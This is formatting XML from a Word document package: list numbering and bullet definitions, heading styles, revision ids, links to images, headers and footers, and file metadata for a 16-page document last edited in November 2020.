      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="372E3AAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FA368EF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="39215DC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C80D3A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nsid w:val="530E0551"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32A076D4"/>
    <w:lvl w:ilvl="0" w:tplc="28C42CD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720"/>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1" w:tplc="D9AEA270">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1090"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17628774">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D1064A0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7056F69C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4B08D860">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="75884F44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="511CF176">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FABC9F6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:r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5A6"/>
    <w:rsid w:val="000357A3"/>
    <w:rsid w:val="000B74D0"/>
    <w:rsid w:val="00112181"/>
    <w:rsid w:val="00134F06"/>
    <w:rsid w:val="0018766C"/>
    <w:rsid w:val="00196FF6"/>
    <w:rsid w:val="00214241"/>
    <w:rsid w:val="003D3CCD"/>
    <w:rsid w:val="00432D05"/>
    <w:rsid w:val="00550178"/>
    <w:rsid w:val="00A40470"/>
    <w:rsid w:val="00A715A6"/>
    <w:rsid w:val="00AC0DC4"/>
    <w:rsid w:val="00B01A41"/>
    <w:rsid w:val="00BD4060"/>
    <w:rsid w:val="00C416A1"/>
    <w:rsid w:val="00C462E6"/>
    <w:rsid w:val="00C94921"/>
    <w:rsid w:val="00CB3F18"/>
    <w:rsid w:val="00D24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383C92-7BDB-4698-9FC8-1C9546B7C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76" w:lineRule="auto"/>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46" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:u w:val="single" w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="237" w:lineRule="auto"/>
      <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFF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shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading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C949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image" Target="media/image57.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.pn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61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.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header" Target="header1.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xm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footer" Target="footer2.xm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171</TotalTime>
  <Pages>16</Pages>
  <Words>1898</Words>
  <Characters>10821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Richard Jones</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-12T14:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-18T16:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>